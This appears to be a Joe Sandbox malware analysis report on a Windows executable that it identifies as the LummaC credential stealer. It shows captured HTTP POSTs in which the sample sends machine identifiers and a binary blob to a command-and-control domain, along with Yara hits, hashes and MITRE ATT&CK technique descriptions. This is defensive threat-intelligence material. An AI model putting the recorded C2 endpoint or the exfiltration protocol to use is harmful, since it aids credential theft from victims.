2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 33 6e 34 55 51 35 45 75 34 39 42 58 38 6d 70 55 4d 54 30 69 36 66 4e 7a 4d 75 4c 39 5a 61 6a 62 65 4a 49 4c 38 41 63 2f 45 37 77 6e 69 30 69 62 33 51 37 58 4e 50 63 62 62 74 68 78 57 58 37 70 5a 76 4d 4b 32 2b 52 5a 79 50 71 6b 6b 7a 71 31 2b 32 64 53 6c 45 75 2f 42 52 4b 51 66 70 49 51 79 6c 34 44 54 55 77 63 42 2f 45 69 38 31 4c 61 34 56 54 68 38 34 57 66 63 76 33 6d 2f 75 74 46 4b 71 35 67 79 2b 56 32 38 39 42 58 43 6c 5a 30 46 55 6c 6d 74 47 72 4c 4d 2b 62 38 4f 45 79 36 76 4b 4d 79 2f 4b 4d 47 37 75 51 6d 69 30 6b 75 30 65 4c 6a 45 4a 64 43 41 67 6b 5a 7a 54 4b 31 51 33 59 48 6d 2b 42 5a 6b 4c 75 45 6b 6b 75 39 77 77 59 44 6d 43 65 4c 43 51 61 38 59 36 4a 31 37 68 59 6e 64 45 68 56 5a 2f 41 4b 75 77 72 62 74 46 6e 49 75 6f 47 66 59 72 6a 69 43 6b 76 Data Ascii: 3n4UQ5Eu49BX8mpUMT0i6fNzMuL9ZajbeJIL8Ac/E7wni0ib3Q7XNPcbbthxWX7pZvMK2+RZyPqkkzq1+2dSlEu/BRKQfpIQyl4DTUwcB/Ei81La4VTh84Wfcv3m/utFKq5gy+V289BXClZ0FUlmtGrLM+b8OEy6vKMy/KMG7uQmi0ku0eLjEJdCAgkZzTK1Q3YHm+BZkLuEkku9wwYDmCeLCQa8Y6J17hYndEhVZ/AKuwrbtFnIuoGfYrjiCkv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49712	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:43:10 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12864 Host: necklacedmny.store
2024-10-28 17:43:10 UTC	12864	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49972	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:44:07 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15110 Host: necklacedmny.store
2024-10-28 17:44:07 UTC	15110	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49987	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:44:10 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19968 Host: necklacedmny.store
2024-10-28 17:44:10 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 17:44:10 UTC	4637	OUT	Data Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 Data Ascii: +?2+?2+?o?Mp5p
2024-10-28 17:44:22 UTC	1022	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 17:44:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aqnk5ee6tkmkapojsncdmc368p; expires=Fri, 21 Feb 2025 11:30:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9txFWL0RIz%2Flg21Emh3TeI%2BrnObwFsOhIBhloPaSsbvj7sQvsK8A6gFTDf8pMdntT8LZ14yWt4g2G7NYVfxAsJ4ut8%2BBJXjo3I6dQlZGvxYLuSXpturbP4T%2BV%2B2AZxOcm7MYUMI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cbb7c2a4444eb-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17805&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=20932&delivery_rate=162778&cwnd=32&unsent_bytes=0&cid=5b33c60aa85c8aa0&ts=11199&x=0"
2024-10-28 17:44:22 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 17:44:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49989	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:44:23 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1199 Host: necklacedmny.store
2024-10-28 17:44:23 UTC	1199	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-28 17:44:58 UTC	1014	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 17:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=svpjko1p08b8bq2625pbntgfn2; expires=Fri, 21 Feb 2025 11:31:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gauv3GfnfLMi%2F5rvR06jpYCO0N4%2BwW3MdwYhffRfjs8idDbSTIm0ElFBqo7APaCSVvBAzOtKnqG1S7Vsa5dIZfrpwiVeaZA4tH3IPqbSqxQYXIqAUEDPzeUzy6LlyQacoU007pI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cbbc8ea022fd8-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2118&delivery_rate=2166043&cwnd=250&unsent_bytes=0&cid=5b05e812dfd53b51&ts=35197&x=0"
2024-10-28 17:44:58 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a Data Ascii: 11ok 155.94.241.188
2024-10-28 17:44:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	13:43:04
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x3d0000
File size:	2'972'160 bytes
MD5 hash:	E9D35001E68E949A301D6D0073BE4661
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 0558979F Relevance: 3.3, Strings: 2, Instructions: 765COMMON

Download Yara Rule

Strings

g, xrefs: 0558979F
qZ, xrefs: 05589E5A

Memory Dump Source

Source File: 00000000.00000003.3278797588.0000000005584000.00000004.00000800.00020000.00000000.sdmp, Offset: 05581000, based on PE: false

Associated: 00000000.00000003.3048973577.0000000005581000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5581000_file.jbxd

Similarity

API ID:
String ID: g$qZ
API String ID: 0-288989974
Opcode ID: 626a1078145dbd6548758d8ee615f5f0a23088056b8302589b622d72bc1bc8e5
Instruction ID: 14a9d60916188d545319ce92a2437b5cbf5baa53d632e587d0f302baf7783478
Opcode Fuzzy Hash: 626a1078145dbd6548758d8ee615f5f0a23088056b8302589b622d72bc1bc8e5
Instruction Fuzzy Hash: 6C42426240E3C00FD3139BB89C666A57FB0AF13221B1E46DBC0D4EF5E3E259594AC762

Function 00E59D40 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_e58000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc32f643072fc828c887649f2b890c449bde294a836ceaaf03f67a414b65da4c
Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
Opcode Fuzzy Hash: cc32f643072fc828c887649f2b890c449bde294a836ceaaf03f67a414b65da4c
Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
file.exe